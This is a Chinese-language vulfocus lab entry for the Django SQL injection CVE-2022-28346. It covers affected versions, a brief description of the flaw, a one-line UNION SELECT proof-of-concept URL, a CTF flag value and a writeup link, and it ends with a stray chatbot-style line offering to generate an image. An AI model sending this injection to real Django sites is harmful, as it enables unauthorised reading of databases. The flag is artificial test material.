Django SQL注入 (CVE-2022-28346)
| ID: | 16478 |
|---|---|
| 标题: | Django SQL注入 (CVE-2022-28346) |
| 描述: | Django SQL注入 (CVE-2022-28346) vulfocus/django-cve_2022_28346:latest Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 在 2.2.28 之前的 Django 2.2、3.2.13 之前的 3.2 和 4.0.4 之前的 4.0 中发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法会通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。 访问:http://ip:port/demo?field=demo.name POC: http://ip:port/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" -- |
| 类型: | WEB |
| 网站: | vulfocus |
| 题目链接: | https://vulfocus.cn |
| 赛事: | None |
| 年度: | None |
| Flag值: | flag-{bmh1059bd0b-be31-45cc-bb24-276b1735076f} |
| writeup: |
https://blog.csdn.net/qq_74447851/article/details/128986710 您是否需要我根据以上内容生成一张说明图片? |